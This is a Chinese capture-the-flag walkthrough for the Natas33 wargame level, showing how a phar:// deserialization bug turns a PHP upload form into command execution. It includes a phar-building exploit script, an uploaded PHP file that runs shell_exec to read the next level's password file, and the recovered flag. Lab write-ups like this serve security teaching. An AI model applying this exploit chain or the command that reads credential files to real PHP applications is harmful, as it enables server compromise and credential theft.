Natas33:
又是一个上传文件的页面,源码如下:
// graz XeR, the first to solve it! thanks for the feedback! // ~morla class Executor{ private $filename=""; //三个私有参数 private $signature='adeafbadbabec0dedabada55ba55d00d'; private $init=False; function __construct(){ //类创建时调用 $this->filename=$_POST["filename"]; if(filesize($_FILES['uploadedfile']['tmp_name']) > 4096) { //限制文件大小 echo "File is too big<br>"; } else { //将文件移动到/natas33/upload/目录下 if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], "/natas33/upload/" . $this->filename)) { echo "The update has been uploaded to: /natas33/upload/$this->filename<br>"; echo "Firmware upgrad initialised.<br>"; } else{ echo "There was an error uploading the file, please try again!<br>"; } } } function __destruct(){ //类销毁时调用 // upgrade firmware at the end of this script // "The working directory in the script shutdown phase can be different with some SAPIs (e.g. Apache)." if(getcwd() === "/") chdir("/natas33/uploads/"); //getchwd() 函数返回当前工作目录。chdir() 函数改变当前的目录。 if(md5_file($this->filename) == $this->signature){ //md5_file() 函数计算文件的 MD5 散列。 echo "Congratulations! Running firmware update: $this->filename <br>"; passthru("php " . $this->filename); //执行外部命令 } else{ echo "Failur! MD5sum mismatch!<br>"; } } } session_start(); if(array_key_exists("filename", $_POST) and array_key_exists("uploadedfile",$_FILES)) { new Executor(); }
查看源码,我们知道,当上传文件的MD5校验与adeafbadbabec0dedabada55ba55d00d匹配时,服务器会执行这个文件。很容易想到MD5碰撞,然而这里是无用的,因为对其进行了限制,限制为4096字节。
查看前端代码,会发现我们可以修改两个参数,文件名和文件内容。在下面这段代码中,我们可以看到文件名的设置,是用的session_id作为默认值。而且源码对上传文件的类型没有限制。
<form enctype="multipart/form-data" action="index.php" method="POST"> <input type="hidden" name="MAX_FILE_SIZE" value="4096" /> <input type="hidden" name="filename" value="<? echo session_id(); ?>" /> Upload Firmware Update:<br/> <input name="uploadedfile" type="file" /><br /> <input type="submit" value="Upload File" /> </form>
继续审计源码,发现在类销毁时调用了__destruct()魔术方法,猜测代码中可能存在PHP反序列化漏洞。
我们利用反序列化漏洞,一般都是借助unserialize()函数,不过随着人们安全的意识的提高,这种漏洞利用越来越来难了,但是在2018年8月份的Blackhat2018大会上,来自Secarma的安全研究员Sam Thomas讲述了一种攻击PHP应用的新方式,利用这种方法可以在不使用unserialize()函数的情况下触发PHP反序列化漏洞。漏洞触发是利用Phar:// 伪协议读取phar文件时,会反序列化meta-data储存的信息(文章地址:https://github.com/s-n-t/presentations/blob/master/us-18-Thomas-It%27s-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It-wp.pdf)。
Phar文件结构
Phar文件主要包含三至四个部分:
1. A stub
- stub的基本结构:<?php HALT_COMPILER();,stub必须以HALT_COMPILER();来作为结束部分,否则Phar拓展将不会识别该文件
2. a manifest describing the contents
- Phar文件中被压缩的文件的一些信息,其中Meta-data部分的信息会以反序列化的形式储存,这里就是漏洞利用的关键点
3. the file contents
- 被压缩的文件内容,在没有特殊要求的情况下,这个被压缩的文件内容可以随便写的,因为我们利用这个漏洞主要是为了触发它的反序列化
4. a signature for verifying Phar integrity
- 签名校验
尝试利用phar反序列化漏洞获取密码
一 序列化
根据文件结构我们来自己构建一个phar文件(php内置了一个Phar类),代码如下:
<?php class Executor { private $filename = "xx.php"; private $signature = True; private $init = false; } $phar = new Phar("test.phar"); //后缀名必须为phar $phar->startBuffering(); $phar->addFromString("test.txt", 'test'); //添加要压缩的文件 $phar->setStub("<?php __HALT_COMPILER(); ?>"); //设置stub $o = new Executor(); $phar->setMetadata($o); //将自定义的meta-data存入manifest $phar->stopBuffering(); //签名自动计算 ?>
这段代码将filename修改成了xx.php,将signature修改为True。这样的的话,MD5比较将会始终为真,passthru()函数将会执行xx.php。
代码直接运行的时候会报错:
将php.ini中的phar.readonly设置成off,重启服务后,重新运行代码,生成了一个test.phar文件。
用Notepad++打开文件,可以发现,meta-data已经以序列化的形式存在test.phar文件中
说明一下:其实就是把要执行的命令序列化保存在phar的压缩文件里
二 反序列化
对应序列化,肯定存在着反序列化的操作。php文件系统中很大一部分的函数在通过phar://解析时,存在着对meta-data反序列化的操作。
首先,上传一个用来读取密码的php文件,代码如下:
<?php echo shell_exec('cat /etc/natas_webpass/natas34'); ?>
用bp将其拦截,修改名称为xx.php。然后点击Go,上传成功。
然后,将生成的phar文件上传,并重命名,点击Go,上传成功。
最后,将文件名修改为phar://test.phar/test.txt,强制md5_file()函数解析phar文档,获取到flag。
flag:shu5ouSu6eicielahhae0mohd4ui5uig
参考:
https://blog.csdn.net/baidu_35297930/article/details/99974886
https://www.cnblogs.com/zy-king-karl/p/11454609.html
https://www.cnblogs.com/Byqiyou/p/10187672.html